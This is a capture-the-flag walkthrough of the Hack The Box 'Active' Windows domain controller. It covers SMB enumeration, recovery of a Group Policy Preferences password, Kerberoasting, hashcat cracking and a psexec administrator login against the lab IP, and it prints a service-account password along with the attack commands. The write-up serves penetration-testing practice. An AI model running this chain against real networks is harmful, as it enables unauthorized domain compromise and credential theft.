Try   HackMD

HTB Series - Active

tags: htb active windows walkthrough

We start by scanning the target with nmap to find open ports
nmap -sC -sV -oA active 10.10.10.100

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Since we can see dns (53), ldap and smb (445) we are likely on a windows server.
Inspecting the output, there are no shares listed, so we can try to connect via smbclient with null authentication to enumerate them.
smbclient -L //10.10.10.100
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The IPC$ and SYSVOL shares are expected of a domain controller.

Smbmap offers similar results

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts.

smbmap -H 10.10.10.100 -r Replication --depth 8 # depth accomplishes was recursive would have, 8 in this case was an estimate of how deep we would have to go.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The output depicts the presence of the Groups.xml file which is of interest to us so we can download it.

smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml # -A acquires the file with the specified pattern

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

From the downloaded file we identify the credentials as follows:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We decrypt the password as shown:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

An alternate way to get this would be to use smbclient

smbclient //10.10.10.100/Replication Password for [WORKGROUP\cypher]: Anonymous login successful Try "help" to get a list of possible commands. smb: \> recurse ON smb: \> prompt OFF smb: \> mget *

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We then use impacket to view the users on the Domain
GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We try further enumeration using the given user account as follows:

smbmap -d active.htb- -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
# -d is for domain, -u is for user, -p is for password and -H is for Host

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We utilize the credentials gathered as follows:

On a windows box, open up a session as the user

runas /netonly /user:active.htb\svc_tgs cmd

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We can use bloodhound to proceed as follows:
Use sharphound on the windows box

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Verify the connection is working okay

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Turns out we just needed to add the DC as the primary DNS in the ethernet settings.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

From Bloodhound we query which accounts are susceptible to kerberoasting

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Attempt at Kerberoasting

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

From the hash acquired, we can look up on example hashcat hashes to find out the cracking mode to use

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We can then proceed to attempt to crack the hash with hashcat

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We then proceed to use the credentials acquired to login as the Administrator via Psexec
psexec.py domain/User@ip

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Own the root flag

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →